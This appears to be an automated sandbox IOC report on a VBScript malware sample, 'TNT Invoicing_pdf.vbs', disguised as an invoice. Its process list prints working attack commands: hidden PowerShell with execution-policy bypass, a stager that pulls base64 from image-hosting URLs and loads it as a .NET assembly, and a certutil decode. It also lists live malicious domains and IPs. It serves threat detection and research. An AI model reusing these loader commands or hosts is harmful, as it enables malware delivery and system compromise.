IOC Report
TNT Invoicing_pdf.vbs

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| `TNT Invoicing_pdf.vbs` | Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators | initial sample | malicious |
| `C:\Users\user\AppData\Local\DesktopPic\PicList.txt` | ASCII text, with CRLF line terminators | dropped | malicious |
| `C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\z0DWX[1].txt` | Unicode text, UTF-8 text, with very long lines (11175), with CRLF line terminators | dropped | |
| `C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive` | data | dropped | |
| `C:\Users\user\AppData\Local\Temp\-2-2FfKI` | SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8 | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dyiayc1.1li.psm1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ymxetr.jg1.ps1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_th4egcug.bll.psm1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqlp3gfd.lqx.ps1` | ASCII text, with no line terminators | dropped | |

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
malicious
C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe
"C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe"
malicious
C:\Windows\SysWOW64\SyncHost.exe
"C:\Windows\SysWOW64\SyncHost.exe"
malicious
C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe
"C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

| Name | IP | Malicious |
|---|---|---|
| http://pesterbdd.com/images/Pester.png | unknown | malicious |
| https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500 | 172.67.215.45 | malicious |
| https://uploaddeimagens.com.br | unknown | malicious |
| http://www.rhyme.academy/avr4/?-zd=Xr58V0PHlxJ&0Zut6f=x3E/o0JgLrsAY3mnIEvxKvoKIfHhyrIBWJwB0arEEJoLlbt8V3ExA9cg1sEiGVbm5mLCkgWBOmXsxt02WvVKyLItEbcRwm1+9Ok94pNpJk46kEUPTjVsVLh1d58gSyvREgIt0DM= | 216.40.34.41 | malicious |
| https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469 | 172.67.215.45 | malicious |
| https://duckduckgo.com/chrome_newtab | unknown | |
| http://nuget.org/NuGet.exe | unknown | |
| https://twitter.com/hover | unknown | |
| https://duckduckgo.com/ac/?q= | unknown | |
| https://www.instagram.com/hover_domains | unknown | |
| http://www.apache.org/licenses/LICENSE-2.0.html | unknown | |
| https://paste.ee/7 | unknown | |
| https://contoso.com/License | unknown | |
| https://www.google.com; | unknown | |
| https://contoso.com/Icon | unknown | |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | unknown | |
| https://analytics.paste.ee | unknown | |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | unknown | |
| https://paste.ee/d/z0DWX | 104.21.84.67 | |
| http://uploaddeimagens.com.br | unknown | |
| https://www.ecosia.org/newtab/ | unknown | |
| https://github.com/Pester/Pester | unknown | |
| http://fanconom.shop | unknown | |
| https://ac.ecosia.org/autocomplete?q= | unknown | |
| https://www.google.com | unknown | |
| https://fanconom.shop | unknown | |
| https://www.hover.com/domains/results | unknown | |
| https://lesferch.github.io/DesktopPic | unknown | |
| https://paste.ee/# | unknown | |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | unknown | |
| https://contoso.com/ | unknown | |
| https://nuget.org/nuget.exe | unknown | |
| https://paste.ee/ | unknown | |
| https://analytics.paste.ee; | unknown | |
| https://cdnjs.cloudflare.com | unknown | |
| https://aka.ms/pscore68 | unknown | |
| https://cdnjs.cloudflare.com; | unknown | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown | |
| https://fanconom.shop/grace/gf.txt | 185.61.152.60 | |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | unknown | |
| https://secure.gravatar.com | unknown | |
| https://themes.googleusercontent.com | unknown | |

Domains

| Name | IP | Malicious |
|---|---|---|
| www.rhyme.academy | 216.40.34.41 | malicious |
| uploaddeimagens.com.br | 172.67.215.45 | malicious |
| bg.microsoft.map.fastly.net | 199.232.210.172 | |
| paste.ee | 104.21.84.67 | |
| fanconom.shop | 185.61.152.60 | |
| fp2e7a.wpc.phicdn.net | 192.229.211.108 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 172.67.215.45 | uploaddeimagens.com.br | United States | malicious |
| 216.40.34.41 | www.rhyme.academy | Canada | malicious |
| 104.21.84.67 | paste.ee | United States | |
| 185.61.152.60 | fanconom.shop | United Kingdom | |

Registry

| Path | Value | Malicious |
|---|---|---|
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | EnableFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | EnableAutoFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | EnableConsoleTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | FileTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | ConsoleTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | MaxFileSize | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | FileDirectory | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | EnableFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | EnableAutoFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | EnableConsoleTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | FileTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | ConsoleTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | MaxFileSize | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | FileDirectory | |

Memdumps

283C000
heap
page read and write
213EF993000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
358C000
unkown
page execute and read and write
1D0537D9000
heap
page read and write
21D3DC4F000
trusted library allocation
page read and write
213ED33D000
heap
page read and write
213EEB30000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
7FFD349A0000
trusted library allocation
page read and write
21D3D306000
heap
page read and write
29B1000
heap
page read and write
9C0000
unkown
page read and write
AC0000
unkown
page readonly
1D0550D0000
heap
page readonly
29B1000
heap
page read and write
1410000
unclassified section
page execute and read and write
2744000
heap
page read and write
29B1000
heap
page read and write
213EEAFA000
heap
page read and write
2C10000
unkown
page read and write
AFE000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213EFB5D000
heap
page read and write
213EEB17000
heap
page read and write
A0961FE000
stack
page read and write
29B1000
heap
page read and write
450E000
stack
page read and write
21D3B700000
heap
page read and write
2690000
heap
page read and write
213ED0D8000
heap
page read and write
1D057BAB000
trusted library allocation
page read and write
213EFB78000
heap
page read and write
29B1000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
2803000
heap
page read and write
213EEAEB000
heap
page read and write
2779000
heap
page read and write
213EF9E6000
heap
page read and write
213EEB62000
heap
page read and write
BDD000
heap
page read and write
21D3B990000
trusted library allocation
page read and write
A9E000
unkown
page readonly
5A4F000
stack
page read and write
21D3D9CE000
trusted library allocation
page read and write
45CD000
heap
page read and write
76D2000
heap
page read and write
213EEB31000
heap
page read and write
2832000
heap
page read and write
213EEB62000
heap
page read and write
213EEB2C000
heap
page read and write
21D557AD000
heap
page read and write
7FFD34866000
trusted library allocation
page execute and read and write
1108000
heap
page read and write
D80000
heap
page read and write
213EF9E6000
heap
page read and write
E5F000
stack
page read and write
29B1000
heap
page read and write
2782000
heap
page read and write
21D55927000
heap
page execute and read and write
7689000
heap
page read and write
D50000
unkown
page readonly
7B3AFE000
stack
page read and write
7BFF000
stack
page read and write
21D3D77C000
trusted library allocation
page read and write
21D3B930000
heap
page read and write
213ECFA0000
heap
page read and write
D70000
unkown
page readonly
29B1000
heap
page read and write
8E9CEFB000
stack
page read and write
29B1000
heap
page read and write
213EEB30000
heap
page read and write
21D3D2D0000
heap
page execute and read and write
CB0000
unkown
page readonly
27D6000
heap
page read and write
56A7000
system
page execute and read and write
213EEB32000
heap
page read and write
213EFA5C000
heap
page read and write
1D05592B000
trusted library allocation
page read and write
213ED0B2000
heap
page read and write
21D3D782000
trusted library allocation
page read and write
29B1000
heap
page read and write
A095DBF000
stack
page read and write
21D3DA25000
trusted library allocation
page read and write
23D8000
stack
page read and write
213EF3CA000
heap
page read and write
76BF000
heap
page read and write
2BF0000
unkown
page read and write
7B41BE000
stack
page read and write
29B1000
heap
page read and write
213EEAE0000
heap
page read and write
213ECFB0000
heap
page read and write
140F000
stack
page read and write
1D055906000
trusted library allocation
page read and write
76AD000
heap
page read and write
29B1000
heap
page read and write
7FFD34962000
trusted library allocation
page read and write
1D06557D000
trusted library allocation
page read and write
213EFA5B000
heap
page read and write
CB0000
unkown
page readonly
29B1000
heap
page read and write
280C000
heap
page read and write
95A000
stack
page read and write
21D3D6BC000
trusted library allocation
page read and write
29B1000
heap
page read and write
2610000
system
page execute and read and write
213EF9B8000
heap
page read and write
213EEB30000
heap
page read and write
A09677B000
stack
page read and write
213EF090000
remote allocation
page read and write
213EF3CA000
heap
page read and write
213ED020000
heap
page read and write
1D065511000
trusted library allocation
page read and write
29B1000
heap
page read and write
213EF360000
heap
page read and write
29B1000
heap
page read and write
F67000
unkown
page read and write
7FFD34970000
trusted library allocation
page execute and read and write
29B1000
heap
page read and write
21D55822000
heap
page read and write
D1A000
stack
page read and write
282C000
heap
page read and write
213EEAE8000
heap
page read and write
213EFB81000
heap
page read and write
29B1000
heap
page read and write
1D05BA0D000
trusted library allocation
page read and write
470D000
direct allocation
page execute and read and write
2740000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213ED33D000
heap
page read and write
8E9CAFE000
stack
page read and write
213ED0B0000
heap
page read and write
10FC000
stack
page read and write
29B1000
heap
page read and write
1D053817000
heap
page read and write
7FFD34931000
trusted library allocation
page read and write
213EEAEC000
heap
page read and write
4558000
heap
page read and write
29B1000
heap
page read and write
8E9CCFE000
stack
page read and write
8E9C8FE000
stack
page read and write
29B1000
heap
page read and write
7FFD34980000
trusted library allocation
page read and write
29B1000
heap
page read and write
213EEAFC000
heap
page read and write
115E000
direct allocation
page execute and read and write
8A1000
unkown
page readonly
213ECFF0000
heap
page read and write
1D0537EF000
heap
page read and write
213EEB30000
heap
page read and write
29B1000
heap
page read and write
213EFAA9000
heap
page read and write
213ED0B0000
heap
page read and write
BB8000
heap
page read and write
A91000
unkown
page execute read
10FC000
stack
page read and write
A09627E000
stack
page read and write
B00000
direct allocation
page read and write
2744000
heap
page read and write
27F4000
heap
page read and write
213EFB5E000
heap
page read and write
1D0558EA000
trusted library allocation
page read and write
A1E000
stack
page read and write
213EFB20000
heap
page read and write
21D3D6E4000
trusted library allocation
page read and write
76B6000
heap
page read and write
7DF42E3D0000
trusted library allocation
page execute and read and write
1486ECB5000
heap
page read and write
21D55858000
heap
page read and write
21D5580A000
heap
page read and write
21D3B749000
heap
page read and write
56CC000
system
page execute and read and write
27C3000
heap
page read and write
2777000
heap
page read and write
750000
unkown
page readonly
89A2000
system
page read and write
29B1000
heap
page read and write
2654000
heap
page read and write
7FFD34A50000
trusted library allocation
page read and write
A9E000
unkown
page readonly
8E9D2FB000
stack
page read and write
29B1000
heap
page read and write
21D3DBFB000
trusted library allocation
page read and write
29B1000
heap
page read and write
1D053750000
heap
page read and write
1040000
unkown
page readonly
29B1000
heap
page read and write
213EEB62000
heap
page read and write
1D055733000
trusted library allocation
page read and write
213EFB5D000
heap
page read and write
7FFD34840000
trusted library allocation
page execute and read and write
21D55A58000
heap
page read and write
27BE000
heap
page read and write
7B3CFE000
stack
page read and write
21D3D77F000
trusted library allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1108000
heap
page read and write
1D056D6A000
trusted library allocation
page read and write
7FFD34920000
trusted library allocation
page read and write
213EF991000
heap
page read and write
213EF9DF000
heap
page read and write
DE1000
unkown
page readonly
2CB0000
heap
page read and write
21D3DAA0000
trusted library allocation
page read and write
213EEC85000
heap
page read and write
29B1000
heap
page read and write
21D3D651000
trusted library allocation
page read and write
29B1000
heap
page read and write
213ED057000
heap
page read and write
BB0000
heap
page read and write
27FE000
heap
page read and write
213EF3DC000
heap
page read and write
364C000
unclassified section
page execute and read and write
770000
heap
page read and write
213ED33D000
heap
page read and write
29B1000
heap
page read and write
213EEAE4000
heap
page read and write
29B1000
heap
page read and write
BB0000
heap
page read and write
213EF3A3000
heap
page read and write
A0960FE000
stack
page read and write
1D0558F4000
trusted library allocation
page read and write
29B1000
heap
page read and write
1D0537DB000
heap
page read and write
29B1000
heap
page read and write
27C3000
heap
page read and write
213ED019000
heap
page read and write
21D55950000
heap
page read and write
2CB4000
heap
page read and write
1D0550A0000
trusted library allocation
page read and write
D60000
unkown
page readonly
76D0000
heap
page read and write
17A1000
unkown
page readonly
213EEC90000
heap
page read and write
29B1000
heap
page read and write
27CD000
heap
page read and write
213ED02F000
heap
page read and write
213ED0B2000
heap
page read and write
29B1000
heap
page read and write
21D3BA00000
heap
page read and write
890000
unkown
page read and write
F6A000
unkown
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
21D3BA05000
heap
page read and write
213EF3A1000
heap
page read and write
1308000
direct allocation
page execute and read and write
213EEAE5000
heap
page read and write
29B1000
heap
page read and write
85C000
stack
page read and write
29B1000
heap
page read and write
8E9D0FD000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
21D55D50000
heap
page read and write
213ED049000
heap
page read and write
2F42000
unkown
page read and write
29B1000
heap
page read and write
1D0550F0000
trusted library allocation
page read and write
213EEAF2000
heap
page read and write
213ED0EC000
heap
page read and write
477E000
direct allocation
page execute and read and write
1D055500000
heap
page read and write
2782000
heap
page read and write
21D3B769000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
2D40000
heap
page read and write
2851000
heap
page read and write
2C6C000
unkown
page read and write
2803000
heap
page read and write
B68000
heap
page read and write
213ECFD0000
heap
page read and write
2768000
heap
page read and write
21D55760000
heap
page read and write
21D4D6BD000
trusted library allocation
page read and write
213EEAE1000
heap
page read and write
7650000
heap
page read and write
29B1000
heap
page read and write
9B0000
heap
page read and write
1D0599AB000
trusted library allocation
page read and write
213EEAE1000
heap
page read and write
213EF3C3000
heap
page read and write
2550000
heap
page read and write
29B1000
heap
page read and write
43A0000
trusted library allocation
page execute and read and write
27F8000
heap
page read and write
29B1000
heap
page read and write
213EEB35000
heap
page read and write
7FFD3493A000
trusted library allocation
page read and write
29B1000
heap
page read and write
213ED0B2000
heap
page read and write
29B1000
heap
page read and write
213EF3A3000
heap
page read and write
1D05DB44000
trusted library allocation
page read and write
213ED01C000
heap
page read and write
7FFD34A10000
trusted library allocation
page read and write
27D0000
heap
page read and write
213EFB67000
heap
page read and write
21D3B9A0000
heap
page readonly
27BE000
heap
page read and write